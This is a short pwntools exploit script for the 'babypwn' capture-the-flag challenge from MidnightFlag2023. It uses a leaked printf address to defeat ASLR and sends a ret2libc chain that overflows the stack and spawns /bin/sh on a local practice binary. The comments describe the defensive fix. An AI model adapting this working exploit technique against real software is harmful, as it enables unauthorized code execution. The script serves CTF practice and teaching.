Babypwn - MidnightFlag2023
from pwn import *
# Exploit script for the "babypwn" challenge (pwntools).
# Flow: read the printf address the binary leaks, derive the libc base from it,
# then send a ret2libc chain (pop rdi; "/bin/sh"; system) over a stack overflow.
# The whole chain hinges on the leak: the binary printing a libc pointer is
# what defeats ASLR here, so the defensive fix is to stop leaking the address
# (and to bound the overflowing read).
elf = context.binary = ELF("./babypwn")
# Must be the exact libc build the target runs: the symbol offsets and the
# hard-coded gadget offset below are all taken from this file.
libc = ELF("./libc.so.6")
r = process()
# Read the leaked libc printf address that the binary prints after "leak: ".
r.recvuntil(b"leak: ")
# assumes the hex address is the next thing on the stream — recv() returns
# whatever is currently available, not necessarily one line; confirm
printf_leak = int(r.recv(), 16)
log.success(f"Printf Leak = {hex(printf_leak)}")
# Recover the libc base: leaked address minus printf's offset inside libc.
libc.address = printf_leak - libc.sym["printf"]
log.success(f"Libc Base: {hex(libc.address)}")
# libc gadget; this offset is specific to this libc.so.6 build and must be
# re-derived if the libc changes.
pop_rdi = libc.address + 0x000000000002a3e5
# `pop rdi; ret` is two bytes, so +1 lands on the bare `ret`; it is placed
# first in the chain, presumably to keep the stack 16-byte aligned on entry
# to system() — confirm if the shell does not spawn.
ret = pop_rdi + 1
system = libc.sym["system"]
binsh = next(libc.search(b"/bin/sh"))
# 72 bytes of padding reach the saved return address — TODO confirm against the binary.
payload = flat("A" * 72,ret,pop_rdi,binsh,system)
r.sendline(payload)
r.interactive()